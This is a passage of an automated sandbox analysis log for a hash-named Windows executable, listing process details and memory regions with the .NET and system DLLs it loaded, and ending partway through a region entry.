# Flog Txt Version 1 # Analyzer Version: 4.2.2 # Analyzer Build Date: Jul 23 2021 05:44:58 # Log Creation Date: 13.09.2021 14:03:30.999 Process: id = "1" image_name = "977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" page_root = "0x6badf000" os_pid = "0x1318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x6d0" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 113 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 114 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 115 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 116 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 117 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 118 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 119 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 120 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 121 start_va = 0x400000 end_va = 0x475fff monitored = 1 entry_point = 0x46fdc2 region_type = mapped_file name = "977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") Region: id = 122 start_va = 0x77110000 end_va = 0x7728afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 123 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 124 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 125 start_va = 0x7fff0000 end_va = 0x7ffb2d1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 126 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 127 start_va = 0x7ffb2d381000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb2d381000" filename = "" Region: id = 265 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 266 start_va = 0x5a1e0000 end_va = 0x5a22ffff monitored = 0 entry_point = 0x5a1f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 267 start_va = 0x5a240000 end_va = 0x5a2b9fff monitored = 0 entry_point = 0x5a253290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 268 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 269 start_va = 0x5a230000 end_va = 0x5a237fff monitored = 0 entry_point = 0x5a2317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 270 start_va = 0x680000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 271 start_va = 0x6d320000 end_va = 0x6d378fff monitored = 1 entry_point = 0x6d330780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 272 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x75710000 end_va = 0x7588dfff monitored = 0 entry_point = 0x757c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 274 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 275 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 276 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 277 start_va = 0x540000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 278 start_va = 0x73d90000 end_va = 0x73e21fff monitored = 0 entry_point = 0x73dd0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 279 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 280 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 281 start_va = 0x74380000 end_va = 0x743fafff monitored = 0 entry_point = 0x7439e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 282 start_va = 0x75a40000 end_va = 0x75afdfff monitored = 0 entry_point = 0x75a75630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 283 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 284 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 285 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 286 start_va = 0x758c0000 end_va = 0x75903fff monitored = 0 entry_point = 0x758d9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 287 start_va = 0x75970000 end_va = 0x75a1cfff monitored = 0 entry_point = 0x75984f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 288 start_va = 0x73e40000 end_va = 0x73e5dfff monitored = 0 entry_point = 0x73e4b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 289 start_va = 0x73e30000 end_va = 0x73e39fff monitored = 0 entry_point = 0x73e32a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 290 start_va = 0x77040000 end_va = 0x77097fff monitored = 0 entry_point = 0x770825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 291 start_va = 0x5d0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 292 start_va = 0x6c8d0000 end_va = 0x6c948fff monitored = 1 entry_point = 0x6c8df82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 293 start_va = 0x74a00000 end_va = 0x74a44fff monitored = 0 entry_point = 0x74a1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 294 start_va = 0x74400000 end_va = 0x745bcfff monitored = 0 entry_point = 0x744e2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 295 start_va = 0x74a50000 end_va = 0x74b9efff monitored = 0 entry_point = 0x74b06820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 296 start_va = 0x755c0000 end_va = 0x75706fff monitored = 0 entry_point = 0x755d1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 297 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 299 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 300 start_va = 0x74990000 end_va = 0x749bafff monitored = 0 entry_point = 0x74995680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 302 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 303 start_va = 0x5d0000 end_va = 0x642fff monitored = 1 entry_point = 0x63fdc2 region_type = mapped_file name = "977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") Region: id = 304 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 305 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 306 start_va = 0xc50000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 307 start_va = 0x77030000 end_va = 0x7703bfff monitored = 0 entry_point = 0x77033930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 308 start_va = 0x6d310000 end_va = 0x6d317fff monitored = 0 entry_point = 0x6d3117b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 309 start_va = 0x6b6f0000 end_va = 0x6bda0fff monitored = 1 entry_point = 0x6b705d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 310 start_va = 0x6c650000 end_va = 0x6c744fff monitored = 0 entry_point = 0x6c6a4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 311 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 312 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 313 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 314 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 315 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 316 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 317 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 318 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 319 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 320 start_va = 0x780000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 321 start_va = 0x2050000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 322 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 323 start_va = 0x2050000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 324 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 325 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 326 start_va = 0x2210000 end_va = 0x420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 327 start_va = 0x2150000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 328 start_va = 0x780000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 329 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 330 start_va = 0x4210000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 331 start_va = 0x4310000 end_va = 0x4646fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 332 start_va = 0x69850000 end_va = 0x6aa77fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 333 start_va = 0x75360000 end_va = 0x7544afff monitored = 0 entry_point = 0x7539d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 334 start_va = 0x4650000 end_va = 0x46e0fff monitored = 0 entry_point = 0x4688cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 335 start_va = 0x6fef0000 end_va = 0x6ff64fff monitored = 0 entry_point = 0x6ff29a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 336 start_va = 0x4650000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 337 start_va = 0x6f820000 end_va = 0x6f832fff monitored = 0 entry_point = 0x6f829950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 338 start_va = 0x6f7f0000 end_va = 0x6f81efff monitored = 0 entry_point = 0x6f8095e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 339 start_va = 0x73ae0000 end_va = 0x73afafff monitored = 0 entry_point = 0x73ae9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 340 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 341 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 342 start_va = 0x6c850000 end_va = 0x6c8cdfff monitored = 1 entry_point = 0x6c851140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 343 start_va = 0x75b00000 end_va = 0x75b91fff monitored = 0 entry_point = 0x75b38cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 344 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 345 start_va = 0x5e430000 end_va = 0x5e4cbfff monitored = 1 entry_point = 0x5e4be9b2 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 346 start_va = 0x46a0000 end_va = 0x473bfff monitored = 1 entry_point = 0x472e9b2 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 347 start_va = 0x6ad40000 end_va = 0x6b6ebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 348 start_va = 0x6c4c0000 end_va = 0x6c64cfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll") Region: id = 349 start_va = 0x68bf0000 end_va = 0x69848fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll") Region: id = 350 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 351 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 352 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 353 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 354 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 355 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 356 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 357 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 358 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 359 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 360 start_va = 0x4740000 end_va = 0x47cefff monitored = 0 entry_point = 0x474dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 361 start_va = 0x6c7b0000 end_va = 0x6c841fff monitored = 0 entry_point = 0x6c7bdd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 362 start_va = 0x4740000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 363 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 364 start_va = 0x47f0000 end_va = 0x48abfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 365 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 366 start_va = 0x7d0000 end_va = 0x7d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 367 start_va = 0x48b0000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 368 start_va = 0x6f730000 end_va = 0x6f74cfff monitored = 0 entry_point = 0x6f733b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 369 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 370 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 371 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 372 start_va = 0x6c3f0000 end_va = 0x6c4b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.remoting.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll") Region: id = 373 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 374 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 375 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 376 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 377 start_va = 0x7e0000 end_va = 0x7e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 378 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 379 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 380 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 381 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 382 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 383 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 384 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 385 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 386 start_va = 0x7fe60000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 387 start_va = 0x7fe50000 end_va = 0x7fe5ffff monitored = 1 entry_point = 0x0 region_type = private name = 